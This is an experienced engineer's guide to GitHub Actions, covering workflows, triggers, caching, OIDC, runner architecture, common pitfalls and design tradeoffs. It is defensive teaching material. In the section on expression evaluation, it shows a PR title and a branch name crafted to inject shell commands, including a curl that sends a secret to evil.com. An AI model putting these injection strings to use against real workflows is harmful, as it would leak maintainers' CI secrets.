GitHub Actions Deep Intuition
An experienced engineer's guide to Github Actions
1. One-Sentence Essence
GitHub Actions is an event-driven job runner welded directly to a Git repository — the repository is the source of truth for what runs, when it runs, and who it speaks for.
Read that sentence three times. Most of what’s confusing about Actions falls out of those four ideas — events, jobs, the welded-to-the-repo part, and the identity (“who it speaks for”). The platform isn’t really “CI/CD.” CI/CD is one thing you can build with it. What it actually is, is a generic mechanism for “when something happens to a repo, run some YAML, with credentials scoped to that repo.” Once you see it that way, you stop being surprised that people use it for stale-issue triage, dependency updates, release publishing, ChatOps, security scans, and yes, build-test-deploy.
The “welded to the repo” part is the key thing other CI systems don’t have. Jenkins is a server you point at a repo. CircleCI is an account you connect to a repo. Actions lives in the repo — the workflow files are version-controlled alongside your code, the identity tokens encode the repo and branch, the secrets scope is the repo, the audit log is the repo. This is the dominant architectural decision and most of the strengths and weaknesses of the platform are downstream of it.
2. The Problem It Solved
Before Actions launched in late 2018, the typical setup for an open-source GitHub project was: code on GitHub, CI somewhere else. Travis CI ran your tests, CircleCI built your Docker images, Jenkins (someone’s lovingly maintained Jenkins) deployed your release. Each system was a separate account, a separate config file (.travis.yml, .circleci/config.yml, a Jenkinsfile), a separate webhook, a separate dashboard, separate secrets management. To set up CI for a new repo you went through five integration flows. To debug a failed build you tabbed between GitHub for the code and a different domain for the logs.
The friction was real but not catastrophic. What pushed GitHub to build Actions was something more strategic: every external CI was a place where developers spent serious time outside GitHub. Every minute on Travis was a minute not on github.com. And — perhaps more importantly — every external CI was a separate system with its own auth, its own token model, its own way of handling secrets. The blast radius of a compromised CircleCI token was unclear in a way that the blast radius of a GitHub token wasn’t.
The insight that drove Actions: what if the CI system was the source-control host? Then workflows live with the code (versioned, reviewable, branchable). Then the identity system is the same one you already have (GitHub identity, repo-scoped tokens). Then there’s no integration step — push a YAML file and it runs. Then there’s a marketplace of pre-built steps anyone can publish, because everyone already has a GitHub account.
There was also a less idealistic motive: locking developers into the GitHub ecosystem. Once your build, deploy, and release tooling is GitHub-flavored YAML calling GitHub-published actions backed by GitHub-hosted runners with GitHub-stored secrets, leaving GitHub becomes a multi-month migration. The platform did solve a real friction problem, and it deepened lock-in. Both things are true.
The result, as of 2026: GitHub reports running on the order of tens of millions of jobs per day, and the Actions Marketplace has become the de facto CI plugin ecosystem for open source. Travis is largely a memory; CircleCI and Jenkins remain but increasingly as specialists rather than defaults.
3. The Concepts You Need
Actions has more vocabulary than most engineers realize, and a fair chunk of the confusion in the field comes from people using these terms loosely. Get these crisp before going further.
The execution hierarchy:
- Workflow — a YAML file in
.github/workflows/. One file = one workflow. The workflow declares what triggers it (on:) and what jobs it contains. - Event — the thing that triggers a workflow.
push,pull_request,schedule,workflow_dispatch(manual button),repository_dispatch(external API call),release,issue_comment, plus a few dozen others. Each event carries a JSON payload — thegithub.eventcontext. - Job — a unit of work that runs on a single runner. A workflow has one or more jobs. By default jobs run in parallel;
needs:makes one wait for another. Each job gets a fresh runner (or runner container). - Step — a single command or action invocation inside a job. Steps in a job run sequentially in the same runner, sharing the filesystem and environment. A step is either
run: <shell>oruses: <action>. - Action — a reusable, packaged unit invoked from a step. An action is a directory with an
action.ymlmanifest, hosted in a Git repo, referenced asowner/repo@ref. There are three kinds: JavaScript actions (run by a Node runtime baked into the runner), Docker actions (the runner pulls and runs a container), and composite actions (a list of steps wrapped as an action).
Where things run:
- Runner — a process that executes a job. It’s a long-running daemon (the “runner agent,” written in C#) that polls GitHub for work, pulls a job, runs it, and reports results. The runner can live on GitHub-hosted infrastructure (you don’t see it) or on your own machines (self-hosted).
- GitHub-hosted runner — a fresh, ephemeral VM (Ubuntu, Windows, or macOS) provisioned by GitHub for one job and destroyed afterward. Pre-loaded with a wild amount of tooling (Docker, gcloud, kubectl, Java, Node, Python, .NET, etc.).
- Self-hosted runner — a runner you operate. Often a Kubernetes pod, often ephemeral, but the lifecycle is yours.
- Larger runner / GPU runner — paid GitHub-hosted SKUs with more CPU/RAM/GPU.
Reuse and modularity:
- Composite action — multiple steps bundled into something callable as a single step (
uses:). Lives anywhere in a repo (often.github/actions/<name>/action.yml). Same job, same runner, no isolation. - Reusable workflow — an entire workflow callable from another workflow via
workflow_call. Lives in.github/workflows/. Each call spawns its own jobs (potentially on different runners). More heavyweight than composite actions; can usesecrets: inherit. - Marketplace action — a third-party action published in a public repo and listed in the GitHub Marketplace. You consume them with
uses: owner/repo@ref.
Identity, secrets, permissions:
GITHUB_TOKEN— an automatic, ephemeral token created for every workflow run. Authenticated as the repo, scoped by thepermissions:block of the workflow. Lasts for the run only.- Secret — an encrypted value stored at repo, environment, or organization level. Injected as an env var, masked in logs, never sent to fork PRs by default.
- Variable (vars) — like secrets but not encrypted; for non-sensitive config (a feature flag, a region name).
- Environment — a named deployment target (
staging,production) that gates a job. Environments can require manual approval, restrict which branches deploy to them, and hold their own secrets. The single most important security primitive in Actions. - OIDC token /
id-token— a short-lived JWT that GitHub Actions can mint, encoding the repo, ref, and environment. Cloud providers can be configured to trust this token, eliminating long-lived static credentials. The modern way to authenticate to AWS, GCP, Azure, npm, PyPI, and so on.
Dangerous events you must know by name:
pull_request— runs in the context of the PR’s fork. By default no secrets, read-only token. Safe.pull_request_target— runs in the context of the base repo with full secrets. Dangerous if you check out the PR’s code.workflow_run— runs after another workflow completes, in the base context with secrets. Has the same danger profile aspull_request_target.
These will come up repeatedly. If you don’t have crisp mental images of pull_request vs pull_request_target, the security section won’t land.
Storage:
- Artifact — a file or directory uploaded by a job for sharing with later jobs or for download from the UI. Stored ~90 days (configurable). Uploaded with
actions/upload-artifact, retrieved withactions/download-artifact. - Cache — keyed blobs of files (typically dependency caches like
~/.npmor~/.cargo) restored at the start of a job and updated at the end. Entries auto-evict after 7 days of no access. 10 GB free per repo, then billed. - Workflow run / job logs — streamed live to GitHub’s UI, kept for the run lifetime.
Contexts and expressions:
- Context — a structured data object available in expressions:
github(event payload, repo, actor, ref),env,secrets,vars,steps(outputs from prior steps),needs(outputs from prerequisite jobs),runner,job,matrix. - Expression —
${{ ... }}syntax. Evaluated by GitHub before the YAML reaches the runner. This evaluation-before-execution is the source of the script injection class of bugs.
If you’ve absorbed all this, the rest of the document will land cleanly. If “composite action vs reusable workflow” or “pull_request vs pull_request_target” still feel hazy, re-read those two clusters before moving on.
4. The Distilled Introduction
4.1 The minimal viable workflow
A workflow file lives at .github/workflows/ci.yml. The directory must be exact — subdirectories are not supported. The filename is up to you. Here is a complete, functioning workflow:
name: CI
on:
push:
branches: [main]
pull_request:
jobs:
test:
runs-on: ubuntu-latest
steps:
- uses: actions/checkout@v4
- uses: actions/setup-node@v4
with:
node-version: '20'
cache: 'npm'
- run: npm ci
- run: npm test
Read that top-down. name: is the human-readable label in the UI. on: lists the triggering events — here, every push to main and every pull request opened against any branch. jobs: is a map of job names to job definitions. runs-on: says where to run (ubuntu-latest is a GitHub-hosted Linux VM). steps: is the ordered list of work.
The first step uses actions/checkout@v4 — the official action that clones your repo into the runner’s filesystem. This is not automatic. A fresh runner starts with no source code; you must explicitly check it out. Forgetting this is the most common first-day mistake. The second step installs Node 20 and configures npm caching (the cache: 'npm' option triggers integration with the runner’s cache). The remaining two steps install dependencies and run tests.
Push that file to the repo. The next push or PR will trigger the workflow. You’ll see the run appear under the Actions tab.
4.2 The trigger model
on: accepts many forms. The variations matter:
on:
# Multiple events
push:
branches: [main, 'release/*']
paths: ['src/**', 'package.json']
paths-ignore: ['**/*.md']
pull_request:
types: [opened, synchronize, reopened]
# Cron schedule (UTC)
schedule:
- cron: '0 6 * * 1' # Mondays at 06:00 UTC
# Manual button in UI
workflow_dispatch:
inputs:
environment:
type: choice
options: [staging, production]
# Called by another workflow
workflow_call:
inputs:
version:
type: string
required: true
Notes that aren’t obvious from the docs:
paths:andpaths-ignore:filter at the file level. If a push doesn’t touch matching files, the workflow doesn’t run. Useful for monorepos.schedule:cron is UTC. There is no SLA for cron precision. Scheduled workflows can be delayed by minutes during high load — don’t rely on them for tight intervals.workflow_dispatch:gives you a “Run workflow” button in the UI plus a REST API endpoint. Inputs become${{ inputs.environment }}.- For a list of types, branches, and so on for any event, the
Events that trigger workflowspage in the GitHub docs is canonical.
4.3 Jobs, dependencies, and parallelism
Jobs run in parallel by default. To serialize, use needs::
jobs:
lint:
runs-on: ubuntu-latest
steps: [...]
test:
runs-on: ubuntu-latest
steps: [...]
build:
needs: [lint, test]
runs-on: ubuntu-latest
steps: [...]
deploy:
needs: build
runs-on: ubuntu-latest
if: github.ref == 'refs/heads/main'
environment: production
steps: [...]
lint and test run in parallel. build waits for both. deploy waits for build and only runs on main and references the production environment — meaning it’ll pause for whatever protection rules that environment has (manual approval, branch restriction, etc).
Each job gets its own runner. Jobs do not share filesystem or environment. If you want to pass data between jobs, you have three mechanisms:
- Outputs — small string values declared in
outputs:and consumed via${{ needs.build.outputs.version }}. - Artifacts — files uploaded by one job and downloaded by another.
- Cache — for dependency caches across runs of the same job.
Mixing these up is a common beginner mistake. Outputs are for strings (a version number, a commit SHA). Artifacts are for files (a built binary). Cache is for the same job across runs (npm packages on every PR).
4.4 Steps, shells, and the run command
Steps run sequentially in the same runner. run: executes shell commands; the default shell is bash on Linux/macOS, pwsh on Windows. Multiline scripts use |:
- name: Build and tag
run: |
VERSION=$(jq -r .version package.json)
echo "Building $VERSION"
docker build -t myapp:$VERSION .
echo "VERSION=$VERSION" >> $GITHUB_ENV
The >> $GITHUB_ENV trick exports an env var to subsequent steps. Likewise >> $GITHUB_OUTPUT writes a step output, and >> $GITHUB_STEP_SUMMARY writes Markdown that appears in the run summary. These four files ($GITHUB_ENV, $GITHUB_OUTPUT, $GITHUB_PATH, $GITHUB_STEP_SUMMARY) are how a run: step communicates back to the workflow engine.
Step IDs let later steps reference earlier ones:
- id: meta
run: echo "tag=v$(date +%Y%m%d)" >> $GITHUB_OUTPUT
- run: echo "Tag is ${{ steps.meta.outputs.tag }}"
4.5 Using actions
The uses: keyword invokes an action. The reference is owner/repo@ref:
- uses: actions/checkout@v4 # tag, mutable
- uses: actions/checkout@08c6903cd8c0fde910a37f88322edcfb5dd907a8 # SHA, immutable
- uses: ./.github/actions/my-local-action # local action in this repo
- uses: docker://alpine:3.19 # Docker image directly
Inputs are passed via with::
- uses: actions/setup-python@v5
with:
python-version: '3.12'
cache: 'pip'
The action’s action.yml defines what inputs it accepts and what outputs it emits. Outputs appear under ${{ steps.<id>.outputs.<name> }} if you give the step an id:.
Pinning is non-trivial and matters for security. Three options:
- Major tag (
@v4) — convenient, mutable, the maintainer can change what it points to. - Specific tag (
@v4.1.2) — still mutable; a tag can be force-pushed. - Full commit SHA (
@08c6...) — immutable. Cannot be changed without a full SHA-1 collision.
For first-party actions/* actions on personal projects, major tags are fine. For third-party actions touching anything sensitive (deploys, releases, secrets), pin to SHA. Section 7 and Section 11 explain why this matters.
4.6 Matrix builds — running variations in parallel
Matrix is the killer feature for testing across versions:
jobs:
test:
runs-on: ${{ matrix.os }}
strategy:
fail-fast: false
matrix:
os: [ubuntu-latest, macos-latest, windows-latest]
python: ['3.10', '3.11', '3.12']
include:
- os: ubuntu-latest
python: '3.13'
experimental: true
exclude:
- os: windows-latest
python: '3.10'
steps:
- uses: actions/checkout@v4
- uses: actions/setup-python@v5
with:
python-version: ${{ matrix.python }}
- run: pytest
This expands to a Cartesian product (3 OS × 3 Python = 9 jobs), minus excludes, plus includes. fail-fast: false keeps all matrix jobs running even if one fails — by default GitHub cancels siblings on failure, which is occasionally useful but usually not what you want.
max-parallel: caps concurrency within the matrix. Without it, all combinations run in parallel up to your account’s concurrency limit (typically 20-180 depending on plan).
4.7 Secrets, variables, and the permissions block
Secrets are encrypted, set in repo/org/environment settings, and accessed via ${{ secrets.NAME }}. They’re auto-masked in logs:
jobs:
deploy:
runs-on: ubuntu-latest
permissions:
contents: read
id-token: write # required for OIDC
pull-requests: write # required to comment on PRs
steps:
- uses: actions/checkout@v4
- run: ./deploy.sh
env:
DEPLOY_TOKEN: ${{ secrets.DEPLOY_TOKEN }}
REGION: ${{ vars.REGION }}
The permissions: block scopes the automatically-injected GITHUB_TOKEN. If you set any permission, all unspecified permissions are set to none. This is a security feature, not a bug. The default — when no permissions: block exists — depends on a repo setting, but the modern best practice is “specify what you need, deny everything else.”
Variables (${{ vars.X }}) are like secrets but unencrypted, for non-sensitive configuration. They’re not masked in logs.
4.8 Caching — the single biggest performance lever
Most CI time is spent installing dependencies. Cache them:
- uses: actions/cache@v4
with:
path: |
~/.cargo/registry
~/.cargo/git
target
key: cargo-${{ runner.os }}-${{ hashFiles('**/Cargo.lock') }}
restore-keys: |
cargo-${{ runner.os }}-
The key: is the exact match — cache hit means a perfect restore. The restore-keys: are prefix-fallback patterns — partial match restores the most recent matching cache, then the build process can update from there. For lockfile-based ecosystems, hashing the lockfile is the standard pattern: any change to dependencies invalidates the cache.
For most languages, the language-specific setup actions (setup-node, setup-python, setup-go) have a cache: parameter that handles this for you. Use that when available.
Caches expire after 7 days unused. The 10 GB per-repo limit is shared across all caches; oldest entries evict first.
4.9 The PR workflow — the hard one
This is where things get sharp. A typical setup:
# .github/workflows/pr-checks.yml
name: PR checks
on:
pull_request:
permissions:
contents: read
jobs:
test:
runs-on: ubuntu-latest
steps:
- uses: actions/checkout@v4
- run: npm ci
- run: npm test
Crucially: when this triggers from a fork’s PR, the GITHUB_TOKEN is read-only and no secrets are passed. This is by design and is what makes pull_request safe. Forks can’t exfiltrate your secrets through your CI.
But this means you can’t do everything. You can’t post coverage comments back to the PR (no write permission). You can’t deploy a preview environment (no deploy secrets). The temptation is to switch to pull_request_target — which runs in the base repo’s context with full secrets and write permissions. Resist this. See Section 7. The correct pattern is the workflow_run split: one untrusted workflow runs the build and uploads artifacts, then a second workflow triggered by workflow_run consumes the artifacts in the privileged context.
4.10 Concurrency control
concurrency: lets you serialize or cancel competing runs:
concurrency:
group: ci-${{ github.ref }}
cancel-in-progress: true
This is essential for two patterns. (1) On PRs, you want the new commit to cancel the previous CI run — saves minutes, gives faster feedback. (2) On deploys, you want one deployment in flight at a time, with new ones queueing — set cancel-in-progress: false.
The group: is just a string. Two runs with the same group conflict. Common keys: ${{ github.workflow }}-${{ github.ref }} (per-workflow per-branch).
4.11 Reusable workflows and composite actions
If you write the same 30 lines of YAML in five repos, factor it out. Two mechanisms:
Composite action — bundles steps. Lives in .github/actions/setup/action.yml:
name: 'Setup project'
inputs:
node-version:
default: '20'
runs:
using: composite
steps:
- uses: actions/setup-node@v4
with:
node-version: ${{ inputs.node-version }}
cache: npm
- run: npm ci
shell: bash
Used like any other action: - uses: ./.github/actions/setup. The shell: is required for every run: step in a composite action — it doesn’t inherit the workflow default.
Reusable workflow — bundles whole jobs. Lives in .github/workflows/build.yml:
on:
workflow_call:
inputs:
env:
type: string
secrets:
DEPLOY_TOKEN:
required: true
jobs:
deploy:
runs-on: ubuntu-latest
steps: [...]
Called from another workflow:
jobs:
deploy-staging:
uses: my-org/templates/.github/workflows/build.yml@main
with:
env: staging
secrets:
DEPLOY_TOKEN: ${{ secrets.STAGING_DEPLOY_TOKEN }}
# or `secrets: inherit` to pass everything
The judgment call between the two is in Section 8. The short version: composite for shared steps within a job, reusable for shared jobs across workflows.
4.12 OIDC — the “no more long-lived secrets” pattern
The single most important security upgrade you can make. Instead of storing AWS access keys as secrets, configure AWS to trust GitHub’s OIDC provider, and have your workflow exchange a short-lived JWT for short-lived AWS credentials:
permissions:
id-token: write
contents: read
jobs:
deploy:
runs-on: ubuntu-latest
steps:
- uses: actions/checkout@v4
- uses: aws-actions/configure-aws-credentials@v4
with:
role-to-assume: arn:aws:iam::123456789012:role/GitHubDeploy
aws-region: us-east-1
- run: aws s3 sync ./dist s3://my-bucket
No AWS_ACCESS_KEY_ID secret. The IAM role’s trust policy says “I trust GitHub’s OIDC issuer, but only for the workflow repo:my-org/my-repo:ref:refs/heads/main.” Token is good for the duration of the job. If the runner is compromised mid-job, the credentials die when the job ends. If your repo is compromised after the fact, no static keys to rotate.
Every major cloud (AWS, GCP, Azure) supports this. So do package registries (npm, PyPI, RubyGems, NuGet, Crates) via “trusted publishing.” If you’re still using long-lived deploy keys in 2026, you’re on the wrong side of history.
4.13 Debugging workflows
The basics:
- Re-run failed jobs only — UI button. Saves rerunning the whole workflow.
- Re-run with debug logging — sets
ACTIONS_RUNNER_DEBUG=trueandACTIONS_STEP_DEBUG=true, dumping verbose logs. tmate— third-party actionmxschmitt/action-tmatethat opens an SSH session into the runner. Saved my life many times. Do not use on untrusted code.act— local runner emulator (a separate tool,nektos/act). Lets you test workflows on your laptop. Imperfect emulation but catches a lot of bugs before pushing.actionlint— static analysis for workflow YAML. Run it in CI to catch typos in expressions, undefined contexts, shell mistakes.zizmor— security-focused linter for workflows. Catches script injection, dangerous triggers, unpinned actions. Strongly recommended.
You will, sooner or later, push a workflow change and watch it fail with Invalid workflow file and no useful detail. Run actionlint locally; the error messages are dramatically better.
5. The Mental Model
Core Idea 1: The repo is the source of truth — for code, config, and identity.
Other CI systems treat the repo as input. Workflows live elsewhere — on a Jenkins server, in a CircleCI account. The CI system has its own identity, and you grant it access to your repo.
Actions inverts this. The workflow YAML is in the repo. The identity is the repo. The token is scoped to the repo. The default secrets are scoped to the repo. The OIDC token’s sub claim is the repo plus ref. The audit log is part of the repo’s audit log.
This predicts:
- Workflow changes are PR-able. You can review CI changes the same way you review code. You can revert them. You can branch them.
- The dangerous events all flow from this.
pull_request_targetexists because GitHub had to figure out what identity to use for a PR from a fork — does the workflow run as “the fork” (no secrets, safe) or as “the base repo” (full secrets, dangerous)? They had to make this an explicit choice and named the dangerous one with a deceptively neutral name. (This was, in retrospect, a mistake.) - Forks are special. A fork is a different repo. A PR from a fork is “code from another repo trying to influence what runs in our repo.” Most of the security model is about navigating this.
- Cross-repo orchestration is painful. Because everything is repo-scoped, doing things that span repos (a build in one repo triggering a deploy in another) requires explicit cross-repo plumbing —
repository_dispatchevents, fine-grained PATs, GitHub Apps. The platform doesn’t want to be cross-repo. If your architecture is multi-repo, expect friction. - Self-hosted runners inherit this scope. A self-hosted runner is registered to a repo, an org, or an enterprise. The scope determines who can run jobs on it. A repo-scoped runner is safe-ish for a private repo. A repo-scoped runner attached to a public repo is a remote code execution oracle — anyone who can submit a PR can run code on your runner.
If you remember nothing else from this section, remember: the repo is the trust boundary. Every weird thing about Actions that surprises you, you can usually figure out by asking “what would this look like if the repo were the unit of trust?”
Core Idea 2: Expressions are evaluated by the workflow engine before the runner sees the YAML.
This is the architectural decision behind the entire script-injection class of bugs.
When you write ${{ github.event.pull_request.title }} in a workflow, here’s what actually happens:
- The workflow engine on GitHub’s servers receives the event.
- It parses the YAML.
- It evaluates all
${{ ... }}expressions, substituting the values into the YAML text. - The resulting expanded YAML is sent to the runner.
- The runner executes whatever shell commands the YAML now contains.
Now consider this:
- run: echo "Title was: ${{ github.event.pull_request.title }}"
If the PR title is "; curl evil.com/exfil?secrets=$AWS_SECRET; echo ", then by the time the runner sees this step, the YAML reads:
- run: echo "Title was: "; curl evil.com/exfil?secrets=$AWS_SECRET; echo ""
The runner has no idea this came from user input. It just runs the shell. This is the original sin of the expression system, and every “use environment variables not interpolation” guideline traces back to it.
This predicts:
- Untrusted input must never flow into
run:blocks via${{ }}. Always pass throughenv:instead. Environment variables don’t get re-interpreted by the YAML engine. - Action inputs have the same problem.
with:values that get interpolated into shells inside the action propagate the vulnerability. Many marketplace actions have CVEs of exactly this shape. - Branch names, issue titles, PR bodies, commit messages, author names — all flexible, attacker-controllable strings. All have appeared as injection points in real CVEs.
- Even “obviously safe” fields aren’t. Branch names like
zzz";curl evil.com;#are valid Git refs. Email addresses are surprisingly permissive.
The mitigation is mechanical:
# DON'T
- run: echo "Title: ${{ github.event.pull_request.title }}"
# DO
- run: echo "Title: $TITLE"
env:
TITLE: ${{ github.event.pull_request.title }}
The env-var approach works because shell variable expansion happens after the YAML is delivered to the runner, in a context where the runner’s quoting rules apply.
These two ideas — repo-as-trust-boundary and pre-execution-expression-eval — explain probably 80% of the things that surprise people about Actions. Section 7 spells out specific gotchas; they all reduce back to one of these two.
6. The Architecture in Plain English
Walk through what actually happens when you push code:
- Event ingestion. GitHub’s core platform notices an event — a push, a PR opened, a cron trigger fires. The Actions service receives this event.
- Workflow planning. The Actions service scans
.github/workflows/on the relevant ref, parses each file, and decides which workflows match the event. For each matching workflow, it builds a dependency graph (DAG) of jobs and figures out which can run immediately (noneeds:). - Job dispatch. Each ready job goes into a queue keyed by its
runs-on:value. Forubuntu-latest, this queues against GitHub’s hosted-runner pool. For a self-hosted label likegpu-cluster, it queues against runners advertising that label. - Runner pickup. Runners poll the Actions service via long-poll HTTPS — they hold a connection open for up to ~50 seconds waiting for a job. When a job is available, the runner gets a
sessionIdand starts pulling job details. - Execution. The runner spins up a Worker process. The Worker downloads the workflow YAML (already with expressions evaluated), pulls referenced actions (Git clones for JS/composite actions,
docker pullfor container actions), and executes steps in order. - Telemetry. Throughout execution, the runner streams logs back to the Actions service. Live logs appear in the UI. Step outcomes update job status.
- Cleanup. GitHub-hosted runners are destroyed after the job. Ephemeral self-hosted runners deregister and shut down. Persistent self-hosted runners go back to polling.
Where state lives, which is the key insight:
- Workflow definitions — in your Git repo. Versioned with code.
- Run history, logs, artifacts — in GitHub’s storage, retained 90 days by default.
- Secrets — encrypted in GitHub’s vault, decrypted at job start, injected into the runner’s environment.
- Cache entries — in GitHub’s blob storage (S3 / GCS), keyed per-repo.
- OIDC tokens — minted on demand by GitHub’s OIDC provider; never stored.
- Runner state — for GitHub-hosted runners, none persists across jobs. For self-hosted, whatever you let persist (this is itself a security concern).
A few things worth knowing about the production architecture:
- The runner agent is C#. It’s a fork of the Azure Pipelines agent. As of 2025, GitHub has stopped accepting external contributions to the runner repo, which suggests an architectural rewrite may be coming.
- The job pickup uses long-poll HTTPS, not push. Runners reach out to GitHub, not the reverse. This is why self-hosted runners only need outbound network access — they don’t need an inbound port. Important for firewalls and VPCs.
- The Actions service was re-architected in 2024-2025. GitHub’s older infrastructure couldn’t keep up with the 23M+ jobs/day load and was redesigned for the next decade. This is also why the new “Broker API” has slightly different semantics than the older Azure Pipelines API the runner was originally built against.
- Cache and artifact storage are separate systems. They have different size limits, different retention, and different rate limits (200 cache uploads/min, 1500 cache downloads/min per repo).
For self-hosted Kubernetes runners under Actions Runner Controller (ARC), the picture has more pieces:
- The ARC controller-manager pod runs in your cluster.
- A Listener pod long-polls GitHub for jobs targeting your scale set.
- When a job arrives, the Listener creates an ephemeral runner pod via Kubernetes APIs.
- The pod fetches a JIT (just-in-time) registration token from GitHub, registers as a runner, accepts the job, runs it, deregisters, and is deleted.
- Repeat.
The ephemerality is essential. A persistent runner that runs job A and then job B can be poisoned by job A’s malicious code persisting state into job B. Ephemeral runners eliminate this — every job gets a fresh container. (GitHub-hosted runners are ephemeral by construction.)
7. The Things That Bite You
Six gotchas that bite roughly everyone in their first year. Each one reduces back to a Section 5 mental model violation.
7.1 You forgot actions/checkout
Expected: “I’m in CI — of course my code is here.”
Reality: A fresh runner has nothing. Your repo is not checked out unless you explicitly run actions/checkout. The first failed step that complains it can’t find package.json is almost always this.
Why: Runners are generic compute. The runner doesn’t know which repo’s code you want, at which ref, with what depth. actions/checkout is a step like any other.
Fix: Add - uses: actions/checkout@v4 as the first step. By default it does a shallow clone of the triggering ref, which is what you want 95% of the time.
7.2 Expression injection via PR titles, branch names, issues
Expected: ${{ github.event.pull_request.title }} is just a string.
Reality: It’s substituted into the shell before the runner runs the shell. Strings can contain shell metacharacters. (Mental Model 2.)
Why: Pre-execution expression evaluation. The YAML engine doesn’t know the shell’s quoting rules.
Fix: Always pass user-controlled data via env:, never inline. actionlint and zizmor flag this automatically. Also: branch names, email addresses, and even github.head_ref are user-controllable.
7.3 pull_request_target plus checkout of the PR head
Expected: “I want to run tests on the PR’s code with my secrets so I can post a coverage comment.”
Reality: pull_request_target runs in the base repo’s context with secrets and write permissions. If you then check out and execute the PR’s code (ref: ${{ github.event.pull_request.head.sha }} followed by npm ci or make test), you’ve handed an external attacker a shell with your secrets and write access to your repo.
Why: pull_request_target was created so you could safely label and comment on PRs, not so you could build PR code with elevated privileges. The naming is regrettable.
Fix: Don’t check out PR code in pull_request_target. Use the pull_request trigger to build (no secrets, safe) and the workflow_run trigger to consume the build artifacts (with secrets, but not running PR code). And carefully — workflow_run has its own subtle issues; treat artifacts as untrusted, validate before extracting. The “Keeping your GitHub Actions secure” series from GitHub Security Lab is the canonical reading on this.
7.4 Caches don’t update when you think they do
Expected: “I cached ~/.npm, so my installs are fast.”
Reality: Cache entries are write-once. Once an entry exists for a given key, future runs with the same key restore it but don’t update it. Your cache becomes a fossil.
Why: GitHub designed caches to be immutable for the same key — concurrent updates would otherwise create races. The intended pattern is: key on something that changes when dependencies change (the lockfile hash), with restore-keys: for partial-match fallback.
Fix: Always include hashFiles('**/<lockfile>') in your cache key. For language ecosystems, prefer the cache: option of actions/setup-* actions, which gets this right by default.
7.5 The permissions: block is all-or-nothing per scope
Expected: “I added pull-requests: write so my workflow can comment on PRs.”
Reality: The moment you set any permissions: value, all unspecified permissions are forced to none. If you previously implicitly had contents: read (because the repo default was permissive), you’ve just lost it.
Why: Security by default — explicit is better than implicit. The platform interprets a permissions: block as “I am declaring exactly what I need.”
Fix: When you set permissions, list every permission the workflow needs. The minimum for almost any workflow is contents: read. For OIDC, add id-token: write. For PR comments, pull-requests: write. For pushing back to the repo, contents: write.
7.6 Self-hosted runners on public repos are a remote shell
Expected: “I’ll use my home server as a self-hosted runner so my open-source project’s CI is faster.” Reality: Anyone can submit a PR. PRs run CI. CI runs on your runner. Therefore anyone has shell access to your runner. Why: GitHub-hosted runners are isolated ephemeral VMs by design. Self-hosted runners are your infrastructure, with whatever access you configured. If your runner has access to your home network, prod credentials, or SSH keys, an attacker submitting a malicious PR has access to all of it. Fix: Never use self-hosted runners on public repos unless (a) you require manual approval for first-time contributors (a setting GitHub provides), (b) the runner is fully ephemeral and network-isolated, and (c) you’ve thought hard about what’s reachable from the runner. The official GitHub docs warn you about this; a surprising number of projects ignore the warning.
8. The Judgment Calls
The differences between someone who copies workflows from Stack Overflow and someone who designs CI for a 200-engineer org. None of these have one right answer; you’re navigating tradeoffs.
8.1 GitHub-hosted vs self-hosted runners
Option A: GitHub-hosted. Free for public repos, generous free tier for private. Pre-loaded toolchains. Ephemeral by construction. No infra to maintain. SLA-backed by GitHub.
Option B: Self-hosted. You operate the compute. Cheaper at scale (potentially 90% less per minute via spot/preemptible instances). Access to your VPC. Custom hardware (ARM, GPU, big-RAM). But you own scaling, security, patching, runner image maintenance.
The real signal: at what monthly minute count does self-hosted cross over to break-even? For most teams, that’s around 30,000-50,000 minutes/month. Below that, the engineering cost of operating self-hosted exceeds the savings. Above that, self-hosted starts paying for itself — but only if you’ve built the operational muscle. The hidden cost: someone has to maintain runner images, manage cache, handle Docker Hub rate limits, monitor pod failures.
What experienced teams choose: A hybrid. GitHub-hosted for everything by default. Self-hosted for the specific workflows that benefit (very large builds, GPU jobs, private-network access). Don’t go all-self-hosted unless you have a platform team that wants this as their job.
8.2 Composite action vs reusable workflow
Option A: Composite action. Bundles steps. Lives in a job, shares the job’s runner. Cannot use secrets: block (you pass secrets as inputs). Cannot use if: on individual steps until recent versions. Compact in workflow run output (one collapsible group).
Option B: Reusable workflow. Bundles whole jobs. Each call gets its own runner. Has secrets: inherit. Each job step appears separately in run output. Cannot be invoked from a matrix until recently and even then with restrictions.
The signal: are you sharing steps within a job or jobs across workflows? “Set up Node, install deps, restore cache” is a composite action — it’s a fragment of a job. “Build, scan, sign, publish” is a reusable workflow — it’s a whole pipeline.
What experienced teams choose: Composite actions for the small-and-frequent (setup, lint, format), reusable workflows for the large-and-shared (security scanning pipeline, deploy pipeline). A common org pattern: a templates repo containing reusable workflows that all repos call, plus per-repo composite actions for repo-specific glue.
8.3 Tag pinning vs SHA pinning for third-party actions
Option A: Tag (@v4 or @v4.1.2). Convenient, readable, gets bug fixes automatically. Mutable — the maintainer (or an attacker who compromises the maintainer) can change what the tag points to.
Option B: Full commit SHA (@08c6903...). Immutable. Cannot be changed without a SHA-1 collision. Inscrutable to read. Stale by default — won’t get fixes until you update.
The signal: what’s the blast radius if this action is compromised? For actions/checkout, the blast radius is “the checked-out code.” Bad but bounded. For an action that has access to deploy secrets and writes to your registry, the blast radius is the entire production system.
What experienced teams choose: SHA-pin everything third-party that touches secrets, deploys, or publishes. Use Renovate or Dependabot to keep the SHAs updated with a 7-14 day cooldown — most supply chain attacks are caught within a week of the malicious version landing. Tag-pin first-party actions/* for low-risk operations. Major orgs in 2026 increasingly enforce SHA pinning at the org level (a feature GitHub shipped in 2025).
8.4 Long-lived secrets vs OIDC
Option A: Stored secrets. AWS_ACCESS_KEY_ID and AWS_SECRET_ACCESS_KEY in repo secrets, valid forever. Simple. Familiar. Works for any service.
Option B: OIDC. Cloud provider trusts GitHub’s OIDC issuer. Workflow mints a short-lived JWT, exchanges it for cloud credentials valid for 1 hour. No long-lived secrets in GitHub.
The signal: does your target system support OIDC? AWS, GCP, Azure, npm, PyPI, RubyGems, NuGet, Crates.io, HashiCorp Vault, Databricks — yes. Some smaller SaaS — no.
What experienced teams choose: OIDC always when supported. The setup cost (configuring an IAM identity provider and trust policy) is real but one-time. The ongoing cost is zero: no rotation, no exposure on disk, no exfiltration risk if a secret leaks. If a service doesn’t support OIDC, store the secret at the environment level with required reviewers rather than at repo level.
8.5 Environments — when to use them
Option A: No environments. Direct deploy from CI. Fast. Simple.
Option B: Environments with gates. Deploy job declares environment: production. Production environment requires manual approval, restricts to main, holds production-specific secrets.
